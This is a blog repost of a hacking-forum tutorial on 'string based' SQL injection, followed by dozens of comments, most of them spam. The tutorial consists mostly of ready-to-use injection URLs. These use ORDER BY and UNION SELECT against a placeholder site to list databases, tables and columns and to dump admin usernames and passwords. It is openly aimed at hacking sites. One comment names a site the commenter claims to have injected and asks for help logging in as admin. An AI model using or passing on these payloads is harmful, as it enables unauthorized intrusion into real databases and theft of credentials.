Pages

Pages - Menu

Thursday, March 1, 2012

String Based SQL injection

Tutorial by Zer0Freak
Difficulty: Easy
Requirements: 10 minutes of reading time, patience and intuition
Previous Chapters:
Chapter1: http://www.hackforums.net/showthread.php?tid=2059771
Chapter2: http://www.hackforums.net/showthread.php?tid=2060211
Chapter3: http://www.hackforums.net/showthread.php?tid=2061628
Chapter4: http://www.hackforums.net/showthread.php?tid=2085773

Alright, since my previous tutorials haven't had enough responses as I expected due to people who aren't fond of reading big tutorials, I've decided I won't make this tutorial big. As a matter of fact, I'll just make you understand the concepts behind String Based SQL injection. I KNOW there are a lot of tutorials that would be the same as this one, but I guarantee that if you read this, you won't have any doubts on String Based.




What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)



Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query
Code:
id=X' order by--+

Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we


String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process

2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step

3.Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "admin"

4.Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+

Results will display the column names from the current table
To convert plain text to hex, use: http://www.swingnote.com/tools/texttohex.php

For this example, we'll use "username" and "password" as our column names

5.Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+

Results will display the data given by the columns you have chosen

This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
Please refer to my previous tutorials to know more about Error Based and Union Based




This will be considered as a mini tutorial for String Based SQL injection. I just hope people are gonna understand this as much as they're on their journey through SQL injection
Hope you guys enjoy this. It's pretty much the concept that is needed when you SQLi
End of Chapter 5
Upcoming Chapter: Blind Based SQL Injection Detailed
Contact me via PM
or
Email: zerofreak@live.com
Have a great day

49 comments:

  1. Awesome tut
    http://iftikharcomputerworld.blogspot.com/

    ReplyDelete
  2. zer0 please i sqlid a site but when i tried loging in with the admin details i had it refused to login
    the site is
    http://www.boydsmiths.in

    ReplyDelete
  3. how if target is wordpress,i'd try with havij but it isnt work

    ReplyDelete
  4. this article is a good booster to my hacking skills. i really liked you artice
    Born 2 hack

    ReplyDelete
  5. I got a job by saying this answer in my last interview. thanks for awesome help.
    I got more idea about oracle from Besant Technologies. If anyone wants to get oraceTraining in Chennai visit Besant Technologies.
    http://www.oracletraininginchennai.in

    ReplyDelete
  6. I enjoy long and detailed tutorials, and would like to see more.
    thanks very much

    ReplyDelete
  7. Bro, where is your next tutorial? really a super tutorial. for your kind information, your chapter 4 don't work.

    ReplyDelete
  8. This blog giving the details of technology. This gives the details about working with the business processes and change the way. Here explains think different and work different then provide the better output. Thanks for this blog.
    Back to Original Services Private Limited

    ReplyDelete
  9. It is a great article. You will surely like this also because it is a great stufff


    Facebook Lite

    ReplyDelete
  10. I found your blog using msn. This is an extremely well written article. I will be sure to bookmark it and return to read more of your useful information. Thanks for the post. I’ll certainly comeback

    Andhra Pradesh SSC results 2017
    AP 10th results 2017
    AP EAMCET Results Date
    AP EAMCET Results 2017
    TS SSC results 2017

    ReplyDelete
  11. I was very impressed by this post, this site has always been pleasant news. Thank you very much for such an interesting post. Keep working, great job! In my free time, I like play game: instagram photos. What about you?

    ReplyDelete
  12. Thank you for taking the time to provide us with your valuable information. We strive to provide our candidates with excellent care and we take your comments to heart.As always, we appreciate your confidence and trust in us

    Java training in Bangalore | Java training in Jaya nagar

    Java training in Bangalore | Java training in Electronic city

    Java training in Chennai | Java training institute in Chennai | Java course in Chennai

    Java training in USA

    ReplyDelete
  13. This is an awesome post.Really very informative and creative contents. These concept is a good way to enhance the knowledge.I like it and help me to development very well.Thank you for this brief explanation and very nice information.Well, got a good knowledge.
    Best Devops Training in pune
    Data science training in pune | Data Science training institute in Pune

    ReplyDelete
  14. Whoa! I’m enjoying the template/theme of this website. It’s simple, yet effective. A lot of times it’s very hard to get that “perfect balance” between superb usability and visual appeal. I must say you’ve done a very good job with this.
    aws training in bangalore
    RPA Training in bangalore
    Python Training in bangalore
    Selenium Training in bangalore
    Hadoop Training in bangalore

    ReplyDelete
  15. Thanks For Sharing Your Information Please Keep UpDating Us The Information Shared Is Very Valuable Time Went On Just Reading The Article Python Online Training Devops Online Training
    Aws Online Training DataScience Online Training
    Hadoop Online Training

    ReplyDelete
  16. Great Article… I love to read your articles because your writing style is too good,
    its is very very helpful for all of us and I never get bored while reading your article because,
    they are becomes a more and more interesting from the starting lines until the end.
    python online training

    ReplyDelete
  17. And indeed, I’m just always astounded concerning the remarkable things served by you. Some four facts on this page are undeniably the most effective I’ve had.
    Data science Course Training in Chennai | No.1 Data Science Training in Chennai
    RPA Course Training in Chennai | No.1 RPA Training in Chennai

    ReplyDelete
  18. You are able That After You May Be Using QuickBooks And Encounter Some Errors Then Try Not To Hyper Because QuickBooks Enterprise Support Number Team Is Present Few Steps Far From You.

    ReplyDelete
  19. For devops training in Bangalore visit:
    Devops Training in Bangalore

    ReplyDelete
  20. Avg is a well- known name in the field of virus protection. The reason for which this name is common among all end users is its free antivirus and malware protection.It not only sounds [url=http://enter-avg.com/retail]avg.com/retail[/url] free but it provides a lot more with no money. It scans for virus and malware.

    ReplyDelete
  21. Webroot Mobile Security is a multi client permit enabling you to utilize your permit on up to 3 gadgets. www.webroot.com/safe On the off chance that you are utilizing the most extreme number of gadgets you should uninstall from the old gadget preceding introducing on the new gadget.

    ReplyDelete
  22. Present norton antivirus with the best help assembling and keep your PC tainting free. www.norton.com/setup Download norton antivirus with the best help assembling and dodge ailment assaults.

    ReplyDelete
  23. To activate Hulu on your device, either use the on-screen keyboard to enter your Hulu log in information or go to www.hulu.com/activate and enter the device activation code. Either of these methods will allow you to use Hulu on any Hulu-supported device.

    ReplyDelete
  24. Microsoft Office setup includes the setup file which helps the users to install the latest version of Microsoft Office on their PC office setup and laptop.

    ReplyDelete
  25. norton provides industry-leading antivirus and security software for your PC, Mac . norton setup with product key Norton Setup and Installation Process – For both PC and mobile users. Highly popular among the PC users

    ReplyDelete
  26. Norton Setup Internet and Device Security. norton com setup with product key Norton give total seCurity to web and device.Every business constantly expected to send the record and subtleties material and everybody needs to beyond any doubt that the archives that are sending the best possible and unique arrangement.

    ReplyDelete
  27. webroot cyber security is a ultimate internet security suite for complete protection against today's diverse range of threat on windows. key features are 100% secure secure shopping, 1 click virus scanning, malicious website filtering, unblock antivirus.Visit webroot purchase our site if you want to install it.

    ReplyDelete
  28. mcafee support phone numberMcAfee antivirus works as a shield of device. It protect against virus, malware, online threats etc. You can easily download, install and activate McAfee products through .Visit mcafee customer service phone number when you will go with this link, you can follow the process of downloading, installing and activating McAfee with activation code

    ReplyDelete
  29. Interesting information and attractive.This blog is really rocking... Yes, the post is very interesting and I really like it.I never seen articles like this. I meant it's so knowledgeable, informative, and good looking site. I appreciate your hard work. Good job.
    Salesforce Training in Chennai | Certification | Online Course | Salesforce Training in Bangalore | Certification | Online Course | Salesforce Training in Hyderabad | Certification | Online Course | Salesforce Training in Pune | Certification | Online Course | Salesforce Online Training | Salesforce Training

    ReplyDelete
  30. Really it is very useful for us..... the information that you have shared is really useful for everyone.Excellent information. oracle training in chennai

    ReplyDelete
  31. Really it is very useful information. Thanks for sharing.

    ReplyDelete
  32. Very Nice Post really expalined good information and Please keep updating us..... Thanks





    ReplyDelete
  33. if ur interested in learning AWS course please visit our website
    AWS Training in Hyderabad

    ReplyDelete
  34. The AWS certification course has become the need of the hour for freshers, IT professionals, or young entrepreneurs. AWS is one of the largest global cloud platforms that aids in hosting and managing company services on the internet. It was conceived in the year 2006 to service the clients in the best way possible by offering customized IT infrastructure. Due to its robustness, Digital Nest added AWS training in Hyderabad under the umbrella of other courses. www.digitalnest.in

    ReplyDelete
  35. Really awesome blog, keep sharing more stuff like this. Thanks for sharing this blog with us.
    Data Science Training

    ReplyDelete
  36. Great post! As someone interested in cloud computing, Start a AWS journey.

    ReplyDelete